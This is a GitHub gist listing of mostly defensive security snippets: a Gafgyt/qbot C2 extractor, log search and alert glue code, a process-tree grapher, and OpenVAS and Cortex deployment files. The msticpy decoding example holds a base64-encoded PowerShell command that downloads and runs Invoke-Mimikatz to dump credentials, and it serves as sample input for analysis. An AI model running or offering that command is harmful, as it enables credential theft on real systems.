Skip to content

Instantly share code, notes, and snippets.

View BoredHackerBlog's full-sized avatar

boredhackerblog BoredHackerBlog

39 followers · 9 following
View GitHub Profile
@BoredHackerBlog
BoredHackerBlog / extractor.py
Created July 23, 2022 23:22
Gafgyt/qbot c2 extractor
#Gafgyt/qbot C2 extractor
#https://bazaar.abuse.ch/browse/signature/Gafgyt/
#The file needs to be unpacked (usually packed with upx)
import re
import sys
# regex from https://www.oreilly.com/library/view/regular-expressions-cookbook/9780596802837/ch07s16.html
ipv4_zero = b"\x00(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):(\d{0,5})\x00"
ipv4_e9 = b"\xe9(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?):(\d{0,5})\x00"
@BoredHackerBlog
BoredHackerBlog / msticpy_b64_unpack.py
Last active May 17, 2022 01:46
base64 command line arg decoding with msticpy
from msticpy.nbtools import *
from msticpy.sectools import *
command = "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA=="
out = base64.unpack(command)
print(out[1]['decoded_string'][0])
# it should print
@BoredHackerBlog
BoredHackerBlog / pyspark_search.py
Last active April 30, 2022 01:58
apache spark / pyspark eve.json search
In [1]: from pyspark.sql import SparkSession
In [2]: spark = SparkSession \
...: .builder \
...: .appName("example") \
...: .getOrCreate()
22/04/29 18:55:18 WARN Utils: Your hostname, ubuntu resolves to a loopback address: 127.0.1.1; using 192.168.95.155 instead (on interface ens33)
22/04/29 18:55:18 WARN Utils: Set SPARK_LOCAL_IP if you need to bind to another address
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties
Setting default log level to "WARN".
@BoredHackerBlog
BoredHackerBlog / graph_proc.py
Created February 1, 2022 14:49
process graph using graphviz and python
from graphviz import Digraph
process_data = []
process_data.append({"pid":"1", "ppid":"204", "path":"c:/cmd.exe"})
process_data.append({"pid":"4", "ppid":"204", "path":"c:/powershell.exe"})
process_data.append({"pid":"204", "ppid":"0", "path":"c:/svhost.exe"})
process_data.append({"pid":"8", "ppid":"4", "path":"c:/net.exe"})
process_data.append({"pid":"10", "ppid":"4", "path":"c:/netsh.exe"})
def graph_process(jsonarray, pid_key, ppid_key, label_key):
@BoredHackerBlog
BoredHackerBlog / ghactions_docker_build.yaml
Last active February 1, 2022 03:18
github actions for docker containers
name: build and upload container
on:
push:
branches: [ main ]
jobs:
build:
runs-on: ubuntu-latest
@BoredHackerBlog
BoredHackerBlog / set_token.py
Created January 23, 2022 19:30
humio stdin testing
import requests
from time import sleep
while True:
try:
if requests.get("http://localhost:8080").status_code == 200:
break
else:
sleep(5)
except:
@BoredHackerBlog
BoredHackerBlog / docker-compose.yaml
Created January 9, 2022 19:31
openvas docker-compose
#taken from here: https://github.com/immauss/openvas/blob/master/compose/docker-compose.yml
#as of jan 9th 2022, it works fine. takes some time to download feeds initially.
version: "3"
services:
openvas:
ports:
- "8080:9392"
environment:
- "PASSWORD=admin"
- "USERNAME=admin"
@BoredHackerBlog
BoredHackerBlog / alert_app.py
Created September 18, 2021 23:00
humio to og alert
from flask import request
from flask import Flask
import opsgenie_sdk
app = Flask(__name__)
og = opsgenie_sdk.configuration.Configuration()
og.api_key['Authorization'] = ""
og.api_client = opsgenie_sdk.api_client.ApiClient(configuration=og)
og.alert_api = opsgenie_sdk.AlertApi(api_client=og.api_client)
@BoredHackerBlog
BoredHackerBlog / 01-netcfg.yaml
Created September 12, 2021 02:34
netplan config for bridge, br0 can be used to sniff traffic between eth1, eth2
# root@host:~# cat /etc/netplan/01-netcfg.yaml
network:
version: 2
renderer: networkd
ethernets:
eth0:
dhcp4: yes
eth1:
dhcp4: no
eth2:
@BoredHackerBlog
BoredHackerBlog / docker-compose.yml
Created August 15, 2021 22:52
cortex standalone (thehive project) from https://github.com/TheHive-Project/Docker-Templates
version: '2'
services:
elasticsearch:
image: 'elasticsearch:7.11.1'
environment:
- http.host=0.0.0.0
- discovery.type=single-node
- script.allowed_types=inline
- thread_pool.search.queue_size=100000
- thread_pool.write.queue_size=10000